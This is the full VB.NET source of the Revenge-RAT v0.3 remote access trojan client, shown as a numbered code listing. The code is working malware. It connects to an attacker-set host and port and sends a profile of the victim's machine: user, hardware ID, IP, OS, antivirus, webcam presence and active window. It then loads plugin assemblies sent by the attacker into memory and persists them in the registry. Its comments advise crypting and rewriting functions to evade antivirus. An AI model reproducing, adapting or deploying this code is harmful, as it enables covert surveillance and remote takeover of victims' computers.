Revenge-RAT v0.3 | Client Fixed

1. ' Fixed By NYAN CAT \\ NOV 25TH, 2018
2.  
3. ' Revenge-RAT Client Source Code v0.3
4. ' By N A P O L E O N
5. ' You can update/Crypt the client again, learn if you want , some codes typed direct for beginners
6. ' if you want good result in runtime vs AV, rewrite some functions much as you can
7. ' Last edit: 2016/12/9
8. Imports System.Management, Microsoft.VisualBasic.Devices, System.Collections.Generic, System.Diagnostics, System.Windows.Forms, System.Globalization, System.IO.Compression, System.Net, System.Threading, Microsoft.Win32, System.Text, System.IO
9.  
10. Public Class Atomic
11.     Public OW As Boolean = False
12.     Public C As Object = Nothing
13.     Public Cn As Boolean = False
14.     Public SC = New Thread(AddressOf MAC, 1)
15.     Public PT As New Thread(AddressOf Pin)
16.     Public I As Integer = 1
17.     Public MS As Integer = 0
18.  
19.     '########################################################
20.     Public Hosts As String() = Split("127.0.0.1,", ",") 'Your IP
21.     Public Ports As String() = Split("333,", ",")       'Your Port
22.     Public Shared Key As String = "Revenge-RAT"         'Your Key
23.     '########################################################
24.  
25.     Public ID As String = "TllBTi1DQVQ="
26.     Public MUTEX As String = "RV_MUTEX-FZMONFueOciq"
27.     Public H As Integer = 0
28.     Public P As Integer = 0
29.     Public Shared SPL As String = "*-]NK[-*"
30.     Public Shared App As String = Application.ExecutablePath
31.     Public Shared SCG As New Atomic
32.     Public Shared DI As ComputerInfo = New ComputerInfo
33.     Public Shared MT As Mutex
34.     Public Shared Tick As System.Threading.Timer = Nothing
35.  
36.  
37.     Shared Sub Main()
38.         SCG.Execute()
39.     End Sub
40.  
41.     Sub Execute()
42.          Try : MT = New Mutex(True, MUTEX, OW) : If Not OW Then End : AddHandler Application.ApplicationExit, Sub() MT.ReleaseMutex()
43.           Catch : End Try
44.         SC.Start() : PT.Start()
45.     End Sub
46.  
47.     Sub Pin()
48. RE:     If I = 0 Then : MS += 1 : End If : Thread.Sleep(1) : GoTo RE
49.     End Sub
50.  
51.     Sub data(ByVal b As Byte()) ' receive commands from RV-RAT
52.         Dim Rev As String() = Split(BS(b), Key)
53.         If Rev(0) = "PNC" Then
54.             I = 0
55.             Send("PNC")
56.         ElseIf Rev(0) = "P" Then
57.             I = 1
58.             Send("P" & Key & MS)
59.             MS = 0
60.             Send("W" & Key & GAW())
61.         ElseIf Rev(0) = "IE" Then ' Ask about plugin
62.             If Not Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & Rev(1), True) Is Nothing Then : Try : INV(Hosts(H), Ports(P), Rev(4), Rev(5), Encode(Decode(ID) & "_" & HWD()), Registry.GetValue("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & Rev(1), Rev(1), Nothing).ToString, Rev(2), Rev(3), Rev(1), True) : Catch : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End Try : Else : Send("GPL" & Key & Rev(5) & Key & Rev(1) & Key & False) : End If
63.         ElseIf Rev(0) = "LP" Then ' invoke plugin
64.             INV(Hosts(H), Ports(P), Rev(1), Rev(2), Encode(Decode(ID) & "_" & HWD()), Rev(3), Rev(4), Rev(5), Rev(6), Rev(7))
65.         ElseIf Rev(0) = "UNV" Then ' uninstall - restart - close .. etc
66.             LA(Rev(1)).CreateInstance(Rev(2)).UNI(Encode(MUTEX), Rev(3), Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Nothing, Rev(4), Rev(5), App, Rev(6), Rev(7), Rev(8), Rev(9), Rev(10), Rev(11), Rev(12), Rev(13))
67.         End If
68.     End Sub
69.  
70.     Public Function INV(ByVal H As String, P As String, N As String, C As String, ID As String, Bytes As String, S As Integer, M As Boolean, MD5 As String, B As Boolean) ' invoke plugin
71.         LA(Bytes).CreateInstance(N & "." & C, True).Start(ID, S, H, P, Key, SPL) : If M Then : Try : If Registry.CurrentUser.OpenSubKey("Software\" & Encode(MUTEX) & "\" & MD5, True) Is Nothing Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : Catch : End Try : If B = False Then : IR("HKEY_CURRENT_USER\SOFTWARE\" & Encode(MUTEX) & "\" & MD5, MD5, Bytes) : End If : End If
72.     End Function
73.  
74.     Public Function LA(B As String) ' load assembly
75.         Return Reflection.Assembly.Load(Decompress(Convert.FromBase64String(B)))
76.     End Function
77.  
78.     Public Function IR(ByVal P As String, N As String, B As String) ' add reg value
79.         Try : Registry.SetValue(P, N, B) : Catch : End Try
80.     End Function
81.  
82.     Sub MAC()
83.  
84.         Dim M As Object = New MemoryStream
85.         Dim lp As Integer = 0
86. re:
87.         Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
88.         Try
89.             If C Is Nothing Then GoTo e
90.             If C.Client.Connected = False Then GoTo e
91.             If Cn = False Then GoTo e
92.             lp += 1
93.             If lp > 300 Then
94.                 lp = 0
95.                 If C.Client.Poll(-1, Sockets.SelectMode.SelectRead) And C.Client.Available <= 0 Then GoTo e
96.             End If
97.             If C.Available > 0 Then
98.                 Dim B(C.Available - 1) As Byte
99.                 C.Client.Receive(B, 0, B.Length, Sockets.SocketFlags.None)
100.                 M.Write(B, 0, B.Length)
101. rr:
102.                 If BS(M.ToArray).Contains(SPL) Then
103.                     Dim A As Array = fx(M.ToArray, SPL)
104.                     Dim T As New Thread(AddressOf data)
105.                     T.Start(A(0))
106.                     M.Dispose()
107.                     M = New IO.MemoryStream
108.                     If A.Length = 2 Then
109.                         M.Write(A(1), 0, A(1).length)
110.                         GoTo rr
111.                     End If
112.                 End If
113.             End If
114.         Catch
115.             GoTo e
116.         End Try
117.         Thread.CurrentThread.Sleep(1)
118.         GoTo re
119. e:
120.         Try : Try : EmptyWorkingSet(Process.GetCurrentProcess.Handle) : Catch : End Try : Catch : End Try
121.         Cn = False
122.         Try
123.             C.Client.Disconnect(False)
124.         Catch
125.         End Try
126.         Try
127.             M.Dispose()
128.         Catch
129.         End Try
130.         Try
131.             Tick.Dispose()
132.         Catch
133.         End Try
134.         M = New MemoryStream
135.         Dim IC As Boolean = False
136.         For Count As Integer = 0 To Hosts.Length - 2
137.             Try
138.                 C = New Sockets.TcpClient() With {.ReceiveTimeout = -1, .SendTimeout = -1, .SendBufferSize = 999999, .ReceiveBufferSize = 999999}
139.                 lp = 0
140.                 CK().Connect(Hosts(Count), Ports(Count))
141.                 Cn = True
142.  
143.                 Send("Information" & Key & ID & Key & Encode("_" & HWD()) & Key & IP() & Key & Encode(Environment.MachineName & " / " & Environment.UserName) & Key & CIVC() & Key & Encode(DI.OSFullName & " " & OP()) & Key & Encode(MP()) & Key & DI.TotalPhysicalMemory & Key & GetProduct("Select * from AntiVirusProduct") & Key & GetProduct("SELECT * FROM FirewallProduct") & Key & Ports(P) & Key & GAW() & Key & Encode(CultureInfo.CurrentCulture.Name) & Key & "False") ' RVUS for make this client special color in lv , true for spread , RVUS for you , and false mean this client didn't come from spread
144.                 H = Count
145.                 P = Count
146.                 IC = True
147.                 Dim T As New TimerCallback(AddressOf Ping)
148.                 Tick = New Threading.Timer(T, Nothing, 10000, 30000)
149.                 GoTo re
150.             Catch
151.                 Thread.Sleep(5000) ' replace it for reconnect time in ms , like 2500 or 5000
152.                 H = 0
153.                 P = 0
154.             End Try
155.         Next
156.         If IC = True Then
157.             IC = False
158.             GoTo e
159.         End If
160.         GoTo re
161.     End Sub
162.  
163.     Sub Ping()
164.         Send("alive??")
165.     End Sub
166.  
167.     Function CK()
168.         Return C.Client
169.     End Function
170.  
171.     Public Sub Send(ByVal b As Byte())
172.         If Cn = False Then Exit Sub
173.         Try
174.             Dim r As Object = New MemoryStream
175.             r.Write(b, 0, b.Length)
176.             r.Write(SB(SPL), 0, SPL.Length)
177.             C.Client.SendBufferSize = b.Length
178.             C.Client.Poll(-1, Net.Sockets.SelectMode.SelectWrite)
179.             C.Client.Send(r.ToArray, 0, r.Length, Sockets.SocketFlags.None)
180.             r.Dispose()
181.         Catch
182.             Cn = False
183.         End Try
184.     End Sub
185.  
186.     Public Sub Send(ByVal S As String)
187.         Send(SB(S))
188.     End Sub
189.  
190.     Public Function IP()
191.         Try : Return CType(Dns.GetHostByName(Dns.GetHostName()).AddressList.GetValue(0), IPAddress).ToString() : Catch : Return "????" : End Try
192.     End Function
193.  
194.     Private Declare Function GVI Lib "kernel32" Alias "GetVolumeInformationA" (ByVal IP As String, ByVal V As String, ByVal T As Integer, ByRef H As Integer, ByRef Q As Integer, ByRef G As Integer, ByVal J As String, ByVal X As Integer) As Integer : Private Declare Function GFW Lib "user32" Alias "GetForegroundWindow" () As IntPtr : Private Declare Auto Function GetWindowText Lib "user32" (ByVal hWnd As IntPtr, ByVal lpString As StringBuilder, ByVal cch As Integer) As Integer : Declare Function capGetDriverDescriptionA Lib "avicap32.dll" (ByVal wDriver As Short, ByVal lpszName As String, ByVal cbName As Integer, ByVal lpszVer As String, ByVal cbVer As Integer) As Boolean
195.     <Runtime.InteropServices.DllImport("psapi")>
196.     Public Shared Function EmptyWorkingSet(ByVal hProcess As Long) As Boolean
197.     End Function
198.  
199.     Public Function HWD() As String
200.         Try : Dim HSN As Integer : GVI(Environ("SystemDrive") & "\", Nothing, Nothing, HSN, 0, 0, Nothing, Nothing) : Return Hex(HSN) : Catch : Return "ERR" : End Try
201.     End Function
202.  
203.     Public Function CIVC() As String
204.         Try : For i As Integer = 0 To 4 : If capGetDriverDescriptionA(i, Space(100), 100, Nothing, 100) Then : Return "Yes" : End If : Next : Catch : End Try : Return "No"
205.     End Function
206.  
207.     Public Shared Function OP() As String
208.         Try : For Each SC As ManagementObject In New ManagementObjectSearcher("select * from Win32_Processor").[Get]() : Return Convert.ToInt32(SC("AddressWidth")) : Next : Catch : Return "????" : End Try
209.     End Function
210.  
211.     Public Function GetProduct(ByVal Product As String) As String
212.         Try : Dim PN As String = String.Empty : For Each AV As ManagementObject In New ManagementObjectSearcher("root\SecurityCenter" & IIf(DI.OSFullName.Contains("XP"), "", "2").ToString, Product).Get : PN &= AV("displayName").ToString : Next : If Not PN = String.Empty Then : Return Encode(PN) : Else : Return Encode("N/A") : End If : Catch : Return Encode("N/A") : End Try
213.     End Function
214.  
215.     Public Function MP()
216.         Try : Return Registry.GetValue("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0", "ProcessorNameString", Nothing).ToString : Catch : Return "????" : End Try
217.     End Function
218.  
219.     Public Function GAW() As String
220.         Dim W As New StringBuilder(256) : GetWindowText(GFW(), W, W.Capacity) : Return Encode(W.ToString())
221.     End Function
222.  
223.     Function SB(ByVal s As String) As Byte()
224.         Return Encoding.Default.GetBytes(s)
225.     End Function
226.  
227.     Function BS(ByVal b As Byte()) As String
228.         Return Encoding.Default.GetString(b)
229.     End Function
230.  
231.     Function fx(ByVal b As Byte(), ByVal WRD As String) As Array
232.         Dim a As New List(Of Byte()), M As New MemoryStream, MM As New MemoryStream, T As String() = Split(BS(b), WRD) : M.Write(b, 0, T(0).Length) : MM.Write(b, T(0).Length + WRD.Length, b.Length - (T(0).Length + WRD.Length)) : a.Add(M.ToArray) : a.Add(MM.ToArray) : M.Dispose() : MM.Dispose() : Return a.ToArray
233.     End Function
234.  
235.     Public Function Decompress(data As Byte()) As Byte()
236.         Dim input As New MemoryStream() : input.Write(data, 0, data.Length) : input.Position = 0
237.         Dim gzip As New GZipStream(input, CompressionMode.Decompress, True), output As New MemoryStream(), buff As Byte() = New Byte(63) {}, read As Integer = -1
238.         read = gzip.Read(buff, 0, buff.Length) : While read > 0 : output.Write(buff, 0, read) : read = gzip.Read(buff, 0, buff.Length) : End While : gzip.Close() : Return output.ToArray()
239.     End Function
240.  
241.     Public Function Encode(ByVal Input As String)
242.         Return Convert.ToBase64String(Encoding.UTF8.GetBytes(Input))
243.     End Function
244.  
245.     Public Function Decode(ByVal Input As String)
246.         Return Encoding.UTF8.GetString(Convert.FromBase64String(Input))
247.     End Function
248.  
249. End Class